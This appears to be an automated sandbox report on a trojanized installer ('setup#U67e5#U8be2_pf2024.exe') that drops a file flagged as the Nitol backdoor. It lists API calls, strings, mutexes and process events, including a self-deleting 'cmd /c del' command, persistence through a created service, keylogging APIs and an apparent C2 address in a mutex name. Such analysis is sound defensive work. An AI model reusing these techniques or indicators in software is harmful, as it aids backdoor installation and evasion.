                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03522634 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_03522634
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10001A30 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_10001A30
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035232A4 Sleep,lstrlen,GetAsyncKeyState,lstrcat,lstrlen,lstrcat,lstrcat,6_2_035232A4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058BB0C GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetSecurityInfo,GetProcessWindowStation,SetProcessWindowStation,CreateDesktopW,LocalFree,LocalFree,CreateDesktopW,LocalFree,SetProcessWindowStation,6_2_0058BB0C

                    System Summary

                    Source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_6BD840E5: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memmove,DeviceIoControl,FindCloseChangeNotification,3_2_6BD840E5
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035248E4 Sleep,OpenSCManagerA,OpenServiceA,DeleteService,GetSystemDirectoryA,lstrcat,DeleteFileA,exit,6_2_035248E4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005787E0 CreateProcessAsUserW,AssignProcessToJobObject,OpenProcessToken,GetTokenInformation,GetLastError,GetLastError,TerminateProcess,SetThreadToken,GetLastError,TerminateProcess,GetLastError,TerminateProcess,GetLastError,TerminateProcess,6_2_005787E0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035222D4 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_035222D4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035239A4 ExitWindowsEx,6_2_035239A4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10002DA0 ExitWindowsEx,6_2_10002DA0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_100016D0 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_100016D0
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetAllUsers.dllP vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehhupd.exeL vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000001.2077759077.0000000001445000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoolsinstutil.dll: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName< vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.000000000470C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamecacheMod.exe: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameMsi.dll,MsiHnd.dll,MsiExec.exeD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameMsi.dll,MsiHnd.dll,MsiExec.exeX vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamesetup.exex, vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameupgrader.exe: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE x, vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenametoolsinstutil.dll: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenameSetAllUsers.dllP vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exeBinary or memory string: OriginalFilenamehhupd.exeL vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                    Source: common.dll.0.dr, Binary string: [Sys_wrapper]WritePrivateProfile fail, session:{}, key:{}, file:{}NtSuspendProcessntdllNtResumeProcess[Sys_wrapper]GetStrValueFromReg, open reg key failed, key:{}, error:{}[Sys_wrapper]GetStrValueFromReg, get reg value failed, key:{}, value_name:{}, error:{}[Sys_wrapper]GetStrValueFromReg, invalid size[Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}[Sys_wrapper]ACLineStatus:{},BatteryFlag:{}kernel32\Device\HarddiskVolume\\.\PhysicalDrive%dA:\%SystemDrive%\ :TENINSTIPGlobal\%s_%X_%de:\dailybuild_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%d
                    Source: RuntimeBroker.exe.0.dr, Binary string: \\.\RtlNtStatusToDosErrorNtQueryInformationProcessntdll.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolumentdll.dllY@\/
                    Source: RuntimeBroker.exe.0.dr, Binary string: sbox_alternate_desktop_local_winstation_0x%X\Device\\/?/?\**~*NtQueryAttributesFileNtQueryFullAttributesFileNtSetInformationFile\/?/?\\??\NtCreateFile
                    Source: classification engine, Classification label: mal100.troj.evad.winEXE@11/16@5/4
                    Source: C:\Users\Wegame\Wegame.exe, Code function: 3_2_1000CF40 GetLastError,FormatMessageA,lua_pushstring,lua_pushfstring,3_2_1000CF40
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: 6_2_035222D4 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_035222D4
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: 6_2_100016D0 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_100016D0
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: 6_2_035265D4 getsockname,GetVersionExA,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GlobalMemoryStatusEx,GetDiskFreeSpaceExA,GetLastInputInfo,GetTickCount,lstrcpy,6_2_035265D4
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_100076E0
                    Source: C:\Users\Wegame\Wegame.exe, Code function: 3_2_0045DC75 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,memset,CloseHandle,OpenProcess,GetModuleFileNameExW,K32GetModuleFileNameExW,SimpleUString::operator=,memset,_wsplitpath_s,SimpleUString::operator=,FindCloseChangeNotification,Process32Next,CloseHandle,3_2_0045DC75
                    Source: C:\Users\Statr\kill.exe, Code function: 4_2_6C7B1C40 SHGetFolderPathW,lstrcatW,CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysAllocString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,4_2_6C7B1C40
                    Source: C:\ProgramData\RuntimeBroker.exe, Code function: 6_2_035282E4 GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, File created: C:\users\Wegame\
                    Source: C:\Users\Wegame\Wegame.exe, Mutant created: \Sessions\1\BaseNamedObjects\_TGP_EXISTS_MUTEX_NAME_
                    Source: C:\ProgramData\RuntimeBroker.exe, Mutant created: \Sessions\1\BaseNamedObjects\154.91.65.2:8000:Rsgiyy icwocqug
                    Source: C:\Users\Wegame\Wegame.exe, Mutant created: \Sessions\1\BaseNamedObjects\WeGameCN_Mutex
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
                    Source: C:\Users\Wegame\Wegame.exe, Mutant created: \Sessions\1\BaseNamedObjects\446e43c4-a90f-56a2-a09d-e5123a135e92
                    Source: setup#U67e5#U8be2_pf2024.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: setup#U67e5#U8be2_pf2024.exe, ReversingLabs: Detection: 52%
                    Source: Wegame.exe, String found in binary or memory: -launcher=
                    Source: Wegame.exe, String found in binary or memory: -launcher
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: -launcher=
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: [IsForInstallation]This is a start from install.[IsForInstallation]This is a start from uninstall.[IsForInstallation]This is not a start from install.--debugdebugstamp_recordmain_start[wegame_launch][step1]Main start.-multi_launcher=wegame.exewegamex.exemulti_launcher_TGP_EXISTS_MUTEX_NAME_[main] wegame already exist.-d-p-ouin=start_from_hostoffline=offline-launcher=[Launcher]Command line game_id not find.launcher_ver[Launcher]Command line version not find.[Launcher]Parser launcher command json fail.[Launcher]Launcher info: %s[Launcher]Launcher parser fail: %s[Launcher]No launcher info.[main]get and set cmd info from cmd_start_info successfullydelete_qb_cookies.txt\clean_cache_flag.dat[CleanCache] need clean page cache.[main]WeGame is in tool mode.[Sys_wrapper]initialize COM library. Error code = %xierd_tgp_daemon.exe[wegame_launch][step2]App inited.app initedbegin...normal end.[main]
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: -launcher
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: Svr_Destory_Tray_IconWeGameCN_Mutex-launcherloop_event_nameZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC231F73356-9B60-4B52-9FF0-F27E3A9BBEC2TGP_EXTERNAL_MESSAGE_RECEIVERStaticB15238A8-2061-4a6e-AB8D-F2533B92D794sys_beginsys_ende:\dailybuild_dev\wegame_client\codes\common\src\app.cppcannot set app path, %s[wegame_quit][step1]exit_app:{}.[wegame_quit][step2]exit_app, will_count_:{}[app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: id-cmc-addExtensions
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: set-addPolicy
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: LoadLibraryExA\/AddDllDirectoryauthauth-intauth-confnonce="realm="algorithm=qop="00000001AUTHENTICATEmd5-sessusername="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%snoncestalerealmopaqueqopMD5-sessSHA-256SHA-256-SESSSHA-512-256SHA-512-256-SESSuserhash%s:%s:%s%s:%s:%08x:%s:%s:%susername="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"username="%s", realm="%s", nonce="%s", uri="%s", response="%s"%s, opaque="%s"%s, algorithm="%s"%s, userhash=trueOKToo long hexadecimal numberIllegal or missing hexadecimal sequenceMalformed encoding foundWrite errorBad content-encoding found`
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: $Scope-Start-Op Scope-End-Op$Perf-Warning-Op,Monitor-Warning-Op Trace-Task-Op Trace-Expt-OpLEVL@
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: run-by-unity-helper
                    Source: setup#U67e5#U8be2_pf2024.exe, String found in binary or memory: /?helplocalepower-onpower-on-in-fullscreenfullscreenclose-at-power-offstart-pausedversionversion-textsethostpassworddatacentermoidnew-tabnew-windowbaredisable-ssl-checkingreloadz-order-chillrun-by-unity-helperquery-licensecan-runnew-snunmountnew-vmfeedbackorigin -s There is a space character in your options. Perhaps you are trying to pass two separate options (such as -q -x) in the first line of your configuration file. If so, you need to merge them (-qx).-%cThe option "%s" requires a value.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: mkisofs 1.15a12 -v -J -R -V VMware Tools -o d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/output/windows.iso d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/winimage
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: d:/build/ob/bora-1463223/bora/apps/install/setup/setup.cpp
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: d:/build/ob/bora-1463223/bora/apps/install/setup/setup.cpp[Info] MsiInstallProduct returned %d --> %s [%Iu][Info] User cancelled installation[Error] %s[Error] The required resource '%s' is missing[Info] Cleaned out installation information for %sHELPER_UIOLDCODESINSTMSIWINSTMSIAinstmsiw.exePROPERTIESinstmsia.exeMINIMUM_NT_MSIMINIMUM_9X_MSISFXINSERTPATCHVM_DATABASELANGUAGESPRODUCTCODEPRODUCTNAMEOPERATION[Info] Will uninstall %s[Info] cacheMod (%s) returned %d" "cacheMod.exe{3B410500-1802-488E-9EF1-4B11992E0440}{B53D42E8-872B-430E-82D4-80065A31FCE1}[Info] Existing product version is older[Info] Existing product version is the same[Info] Existing product version is newer[Info] New product version number is %s[Info] Found existing product %s with version %s[Error] Can't get version for installed product %s (%d)VersionString[Info] Found existing product %s[Info] No existing products found[Info] Checking for existing product %s[Info] Setup exit code is %d[Info] Failed to cleanup extracted files in %s[Info] MsiApplyPatch returned %d and szInstallPackage = {null} and eInstallType = INSTALLTYPE_DEFAULT[Info] Calling MsiApplyPatch with szPatchPackage = %sNOT_REACHED %s:%d
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: change user /INSTALL
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: File_ListDirectory%s\*.*kernel32Schange user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT%s: %s%m/%d/%y %H:%M:%S Failed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: digt ist.qSetup konnte das Windows-Installationsprogramm nicht auf eine Version aktualisieren, die Schema '%s' unterst
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: ltige Msi-Version. Stellen Sie sicher, dass das Element numerisch ist und mindestens '%d' lautet.\Zur Aktualisierung des Windows-Installationsprogramms sind Administratorrechte erforderlich.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup kann keine Dateien nach %s extrahieren. Stellen Sie sicher, dass Sie zum Bearbeiten dieses Verzeichnisses berechtigt sind.0Setup konnte die instmsi-Datei '%1'nicht finden.CSetup konnte das Windows-Installationsprogramm nicht aktualisieren.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: 0PA[Fehler beim Installieren des Pakets. Windows-Installationsprogramm hat '%d' zur
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: r dieses Paket ist eine neuere Version des Windows-Installationsprogramms erforderlich. M
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: chten Sie die Version des Windows-Installationsprogramms auf Ihrem System aktualisieren?aSetup wurde mit einer falschen Betriebsressource '%s' erstellt und kann nicht fortgesetzt werden.&
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup versucht, das Entfernen der Registrierungsinformationen des %s-Installationsprogramms von diesem Computer zu erzwingen. Fahren Sie erst fort, wenn Sie %s auf normalem Weg
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup kann nicht fortgesetzt werden. Das Microsoft-Laufzeit-DLL-Installationsprogramm konnte die Installation nicht abschlie
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: PWD=/cygdrive/d/build/ob/bora-1463223/bora-vmsoft/install/Windows
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: FE2X=C:\Program FilesPROMPT=$P$G$SPWD=/cygdrive/d/build/ob/bora-1463223/bora-vmsoft/install/WindowsPYTHON=D:/build/toolchain/win32/python-2.4.3/python.exePYTHONDONTWRITEBYTECODE=1PYTHONPATH=D:\build\toolchain\noarch\argparse-1.1\lib\python2.6\site-packages;D:\build\apps\gobuild\bin\..RELEASE_BINARIES=d:/build/ob/bora-1463223/publishRELEASE_EXT_PACKAGES=//releng-pa1/current/packagesRELEASE_PACKAGES=d:/build/ob/bora-1463223/publishRELTYPE=GAREMOVE_LOCK=D:/build/toolchain/win32/python-2.6.1/python.exe D:/build/apps/gobuild/bin/gobuildc.py bora-1463223 removelockSCAN_FOR_VIRUSES=1SCMTREESROOT=D:/build/treesSCRIPTNAME=gobuildsSERVERBUILDDIR=d:/build/ob/bora-1463223/bora-vmsoft/build/release/serverSESSIONNAME=ConsoleSHARED_BUILD_MACHINE=1SHELL=D:/build/toolchain/win32/cygwin-1.5.19-4/bin/sh.exeSHLVL=1SIGN_RELEASE_BINARIES=1SIGN_RELEASE_RP<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Attempting to pre-install inf file: "%s"
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: %s change user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTSOFTWARE\VMware, Inc.\VMware Tools\Private%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dll...\*NT OS Type is unknown: Major: %i Minor: %iFailed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldCannot query key value %s\%s\%s: %dInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: wARNING: Failed to get address for GetProfilesDirectory()GetProfilesDirectoryFailed to load userenv.dll: %duserenv.dllchange user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dllNT OS Type is unknown: Major: %i Minor: %iFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldInvalid keyName in Util_CreateKey
                    Source: unknownProcess created: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Wegame\Wegame.exe "C:\users\Wegame\Wegame.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Statr\kill.exe "C:\users\Statr\kill.exe"
                    Source: C:\Users\Statr\kill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\ProgramData\RuntimeBroker.exe "C:\ProgramData\RuntimeBroker.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: setup#U67e5#U8be2_pf2024.exeStatic file information: File size 24674304 > 1048576
                    Source: C:\Users\Statr\kill.exeFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16a5000
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdbxx9t source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader\Upgrader.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\adapt_for_imports.pdb source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdbD source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
